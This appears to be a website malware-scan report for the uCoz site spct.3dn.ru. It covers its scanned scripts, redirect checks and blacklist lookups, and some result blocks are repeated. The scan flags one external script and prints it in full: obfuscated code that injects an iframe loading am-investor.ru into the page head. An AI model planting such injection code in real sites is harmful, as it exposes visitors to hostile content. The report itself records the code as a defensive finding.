Scanned pages/files
| Request | Server response | Status |
http://spct.3dn.ru/ | 200 OK Content-Length: 46940 Content-Type: text/html | clean |
http://s62.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s62.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22618 Content-Type: text/javascript | clean |
http://s62.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://userapi.com/js/api/openapi.js?52 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://ili.pp.ua/js_css/statica.js | 200 OK Content-Length: 858 Content-Type: application/x-javascript | clean |
http://am-investor.ru/higer.js | 200 OK Content-Length: 195 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://am-investor.ru'; wishyhd.appendChild(emptiestag); | ||
http://spct.3dn.ru/index/3 | HTTP/1.1 302 Found Cache-Control: private Connection: close Date: Mon, 29 Sep 2014 03:03:35 GMT Location: http://spct.3dn.ru/register Server: uServ/3.2.2 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 4spctuCoz=; path=/; expires=Sat, 29-Sep-2012 03:03:35 GMT; domain=.spct.3dn.ru; | clean |
http://spct.3dn.ru/register | 200 OK Content-Length: 46436 Content-Type: text/html | clean |
http://spct.3dn.ru/blog/ | 200 OK Content-Length: 98945 Content-Type: text/html | clean |
http://spct.3dn.ru/stuff | 200 OK Content-Length: 106240 Content-Type: text/html | clean |
http://s62.ucoz.net/src/entriesList.js | 200 OK Content-Length: 639 Content-Type: text/javascript | clean |
http://spct.3dn.ru/board/ | 200 OK Content-Length: 50328 Content-Type: text/html | clean |
http://spct.3dn.ru/video/ | 200 OK Content-Length: 45717 Content-Type: text/html | clean |
http://s62.ucoz.net/src/video_gfunc.js | 200 OK Content-Length: 1741 Content-Type: text/javascript | clean |
http://spct.3dn.ru/index/0-83 | 200 OK Content-Length: 38521 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: spct.3dn.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Mon, 29 Sep 2014 03:03:30 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 4spctuCoz=; path=/; expires=Sat, 29-Sep-2012 03:03:31 GMT; domain=.spct.3dn.ru;
Set-Cookie: 4spctuzll=1411959811; path=/; expires=Tue, 29-Sep-2015 03:03:31 GMT; domain=.spct.3dn.ru;
GET / HTTP/1.1
Host: spct.3dn.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Mon, 29 Sep 2014 03:03:30 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 4spctuCoz=; path=/; expires=Sat, 29-Sep-2012 03:03:31 GMT; domain=.spct.3dn.ru;
Set-Cookie: 4spctuzll=1411959811; path=/; expires=Tue, 29-Sep-2015 03:03:31 GMT; domain=.spct.3dn.ru;
Second query (visit from search engine):
GET / HTTP/1.1
Host: spct.3dn.ru
Referer: http://www.google.com/search?q=spct.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: spct.3dn.ru
Referer: http://www.google.com/search?q=spct.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=spct.3dn.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://spct.3dn.ru/
Result: spct.3dn.ru is not infected or malware details are not published yet.
Result: spct.3dn.ru is not infected or malware details are not published yet.